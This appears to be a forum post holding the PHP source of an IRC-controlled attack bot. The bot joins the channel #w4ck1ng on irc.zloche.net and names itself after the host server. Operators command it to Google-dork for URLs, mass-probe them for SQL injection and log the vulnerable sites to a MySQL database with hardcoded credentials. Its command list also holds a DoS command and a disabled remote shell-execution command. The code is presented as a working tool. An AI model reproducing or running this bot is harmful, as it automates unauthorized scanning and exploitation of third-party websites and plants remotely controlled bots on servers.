Код:
<?php
set_time_limit(0);
error_reporting(E_ALL);
echo "Go\n";
function msg ($message, $chan, $socket)
{
//print_r($message);
if (is_array($message))
{
foreach ($message as $line )
{
echo $line;
fputs($socket, "PRIVMSG ".$chan." :" . $line . "\n");
}
} else {
fputs($socket, "PRIVMSG ".$chan." :" . $message . "\n");
}
}
function logVuln ($url, $type, $finder)
{
echo "Log";
if (!$dbconnect)
{
echo "connect";
$db_host = "localhost";
$db_user = "vulnLog";
$db_pwd = "[8K]cS(zfab)U~C2!-DfC..Ywy";
$db_name = "vulnLog";
$dbconnect = mysql_connect($db_host, $db_user, $db_pwd);
mysql_select_db($db_name) or die(msg("Could connect to SQL DB", $chan, $socket));
}
$insert = "INSERT INTO `vulns` ( `type` , `url` , `finder`)
VALUES ( '$type', '$url', '$finder'
);";
echo "insert";
if (mysql_num_rows(mysql_query("SELECT `id` FROM `vulns` WHERE `url` = '$url';", $dbconnect)) == 0)
{
mysql_query($insert);
echo "insterted";
}
}
function gimme($type, $num)
{
if (!$dbconnect)
{
echo "connect";
$db_host = "localhost";
$db_user = "vulnLog";
$db_pwd = "[8K]cS(zfab)U~C2!-DfC..Ywy";
$db_name = "vulnLog";
$dbconnect = mysql_connect($db_host, $db_user, $db_pwd);
mysql_select_db($db_name) or die(msg("Could connect to SQL DB", $chan, $socket));
}
echo "getting vulns";
$limit = mysql_num_rows(mysql_query("SELECT `id` FROM `vulns`", $dbconnect)) - $type;
$select = "SELECT `url`, `finder` FROM `vulns` WHERE `type` = '$type' AND `id` > '" . rand(1, $limit) . "' LIMIT 0 , 3;";
$resultz = mysql_fetch_assoc(mysql_query($select, $dbconnect));
print_r($resultz);
print_r($results);
print_r($select);
return $resultz;
}
function google ($string)
{
$url = $string; # Save the target as $url.
$curl = curl_init(); # Start cURL, it will be used to get contents of webpage.
curl_setopt($curl, CURLOPT_REFERER, "www.google.com");
curl_setopt($curl, CURLOPT_URL, 'http://www.google.co.uk/search?q=' . urlencode( $string));
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
$return = curl_exec($curl);
$exp = "/www[a-zA-Z0-9\/=.?]*\s/";
$numurls = preg_match_all($exp, $return, $urls);
$x = 0;
foreach ($urls[0] as $url )
{
$gurl[$x] = $url;
$x++;
}
curl_close($curl);
return($gurl);
}
function sqlinject ($url)
{
$curl = curl_init(); # Start cURL, it will be used to get contents of webpage.
curl_setopt($curl, CURLOPT_REFERER, "www.google.com");
$url = explode ( '=', $url);
$attack = $url[0] . '=--';
curl_setopt($curl, CURLOPT_URL, $attack);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
$return = curl_exec($curl);
if (eregi("error", $return))
{
logVuln ($attack, "SQL", "NotCodedYet");
return $attack . " is vuln!";
}
else
return "Not vuln";
}
$config = array(
'server'=>'irc.zloche.net',
'port'=>'6667',
'master'=>'Orijin4l',
'prefix'=>'LulZ[',
'chan'=>'#w4ck1ng',
);
$nick = $config['prefix'] . rand(1, 15) . " ^ " . $_SERVER['HTTP_HOST'];
echo "Loaded Config - Nick: $nick\n";
$socket = fsockopen( $config['server'] , $config['port'] );
echo "Connected\n";
usleep (10000);
fputs($socket,'USER bot bot bot :Bot' . "\n");
fputs($socket,'NICK ' . $nick . "\n");
echo "Sent Auth Info\n";
fputs($socket, 'JOIN ' . $config['chan'] . "\n" );
while(!feof($socket)) {
$data = fgets($socket, 1024);
flush();
echo $data;
// Separate all data
$ex = explode(' ', $data);
if($ex[0] == "PING")
{
fputs($socket, "PONG ".$ex[1]."\n");
echo "Pong\n";
}
if ($ex[1] == "PRIVMSG")
{
switch ($ex[3])
{
case ':!dos':
msg( 'Im going to DoS ' . $ex[4], $ex[2], $socket );
break;
case ':!ssh':
/*
msg($ex[4], $ex[2], $socket );
exec(trim($ex[4]) . ' ' . trim($ex[5]) , $return );
var_dump($return);
msg($line, $ex[2], $socket );
unset($return);
*/
msg ("Disabled for now", $ex[2], $return);
break;
case ':!sqldork':
$search = $ex[4] . " " . $ex[5] . " " . $ex[6];
msg ('Running a SQL fuzz on the google of ' . $search, $ex[2], $socket );
$greturn = google($search);
msg (count($greturn) . " results loaded", $ex[2], $socket);
foreach($greturn as $target)
{
msg ("Attempting to inject " . $target, $ex[2], $socket);
msg (sqlinject($target), $ex[2], $socket);
}
msg ("Done Injecting", $ex[2], $socket);
break;
case ':!sql':
msg ('Attempting to Inject' . $ex[4], $ex[2], $socket );
msg (sqlinject($ex[4]), $ex[2], $socket);
msg ('Done with ' . $ex[4], $ex[2], $socket);
break;
case ':!gimme':
if (!is_int($ex[5]))
$ex[5] = 3;
msg ('Retriving ' . $ex[5] . ' ' . $ex[4] . ' vulns', $ex[2], $socket);
$gimme = gimme($ex[4], $ex[5]);
foreach ($gimme as $gimme2)
{
echo $gimme2;
msg($gimme2, $ex[2], $socket);
}
break;
}
}
}
?>
